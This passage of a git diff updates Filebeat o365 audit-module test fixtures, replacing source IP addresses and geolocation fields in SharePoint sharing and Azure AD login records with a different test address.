+ "client.ip": "216.160.83.57",
 "event.action": "AnonymousLinkCreated",
 "event.category": "web",
 "event.code": "SharePointSharingOperation",
@@ -351,7 +350,7 @@
 "input.type": "log",
 "log.offset": 5028,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
 "o365.audit.CreationTime": "2020-02-14T18:25:45",
 "o365.audit.EventData": "Edit",
@@ -378,20 +377,19 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -409,8 +407,8 @@
 },
 {
 "@timestamp": "2020-02-14T18:25:45.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "SharingSet",
 "event.category": "web",
 "event.code": "SharePointSharingOperation",
@@ -427,7 +425,7 @@
 "input.type": "log",
 "log.offset": 6178,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
 "o365.audit.CreationTime": "2020-02-14T18:25:45",
 "o365.audit.EventData": "Contribute",
@@ -455,20 +453,19 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -486,8 +483,8 @@
 },
 {
 "@timestamp": "2020-02-14T18:25:44.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "SharingSet",
 "event.category": "web",
 "event.code": "SharePointSharingOperation",
@@ -504,7 +501,7 @@
 "input.type": "log",
 "log.offset": 7466,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
 "o365.audit.CreationTime": "2020-02-14T18:25:44",
 "o365.audit.EventData": "Limited Access",
@@ -532,20 +529,19 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -563,8 +559,8 @@
 },
 {
 "@timestamp": "2020-02-14T18:25:44.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
+ "client.ip": "216.160.83.57",
 "event.action": "SharingSet",
 "event.category": "web",
 "event.code": "SharePointSharingOperation",
@@ -581,7 +577,7 @@
 "input.type": "log",
 "log.offset": 8685,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
 "o365.audit.CreationTime": "2020-02-14T18:25:44",
 "o365.audit.EventData": "System.LimitedEdit",
@@ -609,20 +605,19 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
diff --git a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log
index c3ce778caf06..76f787faad4a 100644
--- a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log
+++ b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log
@@ -1,69 +1,69 @@ -{"InterSystemsId": "03616b3a-fc75-46a1-b34a-2d82fc8f1e7e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:13", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c4206c29-46c2-4a6f-a46b-735107705400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ca0efc24-1b89-4962-8fef-a3ac5437302f"} -{"InterSystemsId": "05d69096-cb90-4690-ae69-8acd5177b3e0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ed155e11-60b3-4764-b9aa-05c35f3bb800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b53de36d-ea71-4ebf-9b71-feb431bd4eba"} -{"InterSystemsId": "0f5eb16e-8b22-49bf-a927-f6f310fd5879", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "6634d05a-72ec-4c27-8e69-03c57b202000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", 
"Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "10e2d141-839e-4913-ab3d-6cf1f4856eae"} -{"InterSystemsId": "1150acae-a48d-4752-8847-7bacb7fe6e6c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1809f830-b010-4389-9607-e01ae175ca00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "68b3fd99-0dae-4479-926d-03cc0073dd08"} -{"InterSystemsId": "16e81fcc-add3-46c2-8834-10ce330ffe76", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:22", "Actor": [{"Type": 0, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2a84e6ff-7340-426e-9d0d-e53092c0c600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "550af372-cdfd-4286-a1b7-d58df0dcd5d6"} -{"InterSystemsId": "172703f7-324e-415a-a846-c39ca97eb1c8", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": 
"5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d66cd29f-596e-4878-b756-92b545d25f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b5f59a43-00cf-42c4-8685-a7166fd20e38"} -{"InterSystemsId": "17f8756c-0bfa-49ad-8537-ada4e17a5f7d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:41", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1b395e92-5d02-408f-8bfe-139098a95500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "32e7fb94-6289-4fb4-855b-2ab78671ca4e"} -{"InterSystemsId": "22aac168-9d0d-4c70-b94d-adc337ab7b06", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba18ea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "7314a65a-f383-40fb-a0c7-00c6c4cfabc0"} -{"InterSystemsId": "23321532-a321-4c97-909d-9489979777d6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": 
"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1909acba-a486-4ffc-805c-09fb73c0bf00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "97b494ee-9ba1-4444-b052-3459bdc9eaa5"} -{"InterSystemsId": "291fb7ce-4e56-47fd-a78e-4e9012f112ab", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", 
"Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "391870e6-1729-40ae-9ebb-51e0652fec9b"} -{"InterSystemsId": "30e5377b-31d8-42c2-8170-13404afacde7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8971516f-3ef3-4de0-b6b8-ebfae386bc00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a7538fb0-3213-41dc-ab38-1aed787e0cdc"} -{"InterSystemsId": "32e2f533-40fb-4783-8c66-d1bad7e1cc88", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": 
"755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "74ab94ce-8928-4aff-8fa2-a66ad6d41f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e2a15fc0-6892-41f5-a41c-e515231cbb0a"} -{"InterSystemsId": "3c5d16f4-16a6-45f4-a53d-abb86e35005b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:08", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": 
"00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f716345800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e11538ff-5fe1-4fdd-8c5d-219d85c47bb3"} -{"InterSystemsId": "40077a75-7b58-4623-a64a-f1b7de70fa54", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:27", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, 